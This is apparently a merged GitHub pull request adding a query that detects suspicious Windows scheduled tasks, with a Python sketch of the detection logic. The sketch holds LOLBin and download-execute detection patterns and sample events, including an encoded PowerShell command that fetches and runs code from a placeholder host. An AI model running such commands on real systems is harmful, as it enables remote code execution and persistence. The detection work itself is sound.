New Query: Suspicious Scheduled Task Creation#66

Merged
dweissbacher merged 1 commit into main from submission/d36a9db1-90bb-4a00-a83e-10b9a7de2b50 on Jun 29, 2026

Conversation

@byteray-cql-hub-bot (Contributor)

New Query Submission

Name: Suspicious Scheduled Task Creation
Author: ByteRay GmbH
Submission ID: d36a9db1-90bb-4a00-a83e-10b9a7de2b50

Description

Surfaces newly registered Windows scheduled tasks whose execution command or arguments match patterns commonly abused for persistence and remote code execution: encoded PowerShell combined with download/exec intent, LOLBin proxy execution, payloads launched from user-writable paths, embedded web URLs, and chained cmd one-liners. Tasks created remotely (RemoteAddressIP4/IP6 populated) are flagged as a higher-priority lateral-movement signal. A commented author filter lets analysts suppress their own validated software-deployment / RMM accounts after baselining.


This PR was automatically created by the CQL Hub submission pipeline.
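As an added illustration, not code from this PR or from ByteRay's CQL query (which is not shown on this page), the following Python sketches the classification the description lays out, run over a few constructed task-creation events. The field names (author, command, arguments, remote_ip standing in for RemoteAddressIP4/IP6), the LOLBin list and the path and command patterns are assumptions chosen for the example.

```python
import base64
import re
from dataclasses import dataclass
@dataclass
class TaskEvent:  # field names are assumptions for this example, not a confirmed telemetry schema
    author: str
    command: str       # image the task launches
    arguments: str
    remote_ip: str = ""  # stands in for RemoteAddressIP4/IP6; non-empty means registered remotely

LOLBINS = {"mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "wscript.exe", "bitsadmin.exe"}
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Users\\Public|ProgramData)\\", re.I)
URL = re.compile(r"https?://", re.I)
DOWNLOAD_EXEC = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biex\b|invoke-expression", re.I)
ENCODED = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})", re.I)
CHAINED = re.compile(r"\bcmd(?:\.exe)?\b.*(?:&&|&|\|\||\|)", re.I)
ALLOWED_AUTHORS: set[str] = set()  # validated deployment / RMM accounts, filled in after baselining

def decode_encoded_powershell(text: str) -> str:
    # -enc/-EncodedCommand carries base64 of UTF-16LE; return '' when absent or undecodable
    m = ENCODED.search(text)
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le", errors="ignore") if m else ""
    except ValueError:
        return ""

def classify(ev: TaskEvent) -> list[str]:
    # tags fired by one task-creation event; an empty list means no pattern matched
    if ev.author in ALLOWED_AUTHORS:
        return []
    full = f"{ev.command} {ev.arguments}"
    decoded = decode_encoded_powershell(full)
    checks = [
        ("encoded_powershell_download_exec", bool(decoded and DOWNLOAD_EXEC.search(decoded))),
        ("lolbin_proxy_execution", ev.command.strip('"').rsplit("\\", 1)[-1].lower() in LOLBINS),
        ("user_writable_path", bool(USER_WRITABLE.search(full))),
        ("embedded_url", bool(URL.search(full + decoded))),
        ("chained_cmd_oneliner", bool(CHAINED.search(full))),
    ]
    hits = [name for name, fired in checks if fired]
    if hits and ev.remote_ip:  # remote registration escalates any hit to the lateral-movement tier
        hits.append("remote_creation_high_priority")
    return hits
# Constructed sample events; the encoded command is built here for the demo, not captured from a host.
SAMPLE_ENC = base64.b64encode("IEX (New-Object Net.WebClient).DownloadString('http://updates.example.invalid/a')".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    TaskEvent("CORP\\svc_backup", "C:\\Windows\\System32\\svchost.exe", "-k netsvcs"),
    TaskEvent("CORP\\jdoe", "powershell.exe", f"-nop -w hidden -enc {SAMPLE_ENC}", "198.51.100.7"),
    TaskEvent("CORP\\jdoe", "C:\\Windows\\System32\\mshta.exe", "C:\\Users\\Public\\sync.hta"),
    TaskEvent("CORP\\ops", "cmd.exe", "/c copy C:\\ProgramData\\a.log D:\\a.log & del C:\\ProgramData\\a.log"),
]
```

Running `classify` over `SAMPLE_EVENTS` leaves the svchost task untagged, escalates the remotely registered encoded-PowerShell task, and tags the mshta and chained cmd tasks on the path and command patterns alone.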

dweissbacher merged commit a5fbeb0 into main on Jun 29, 2026
2 checks passed
dweissbacher deleted the submission/d36a9db1-90bb-4a00-a83e-10b9a7de2b50 branch on June 29, 2026 10:19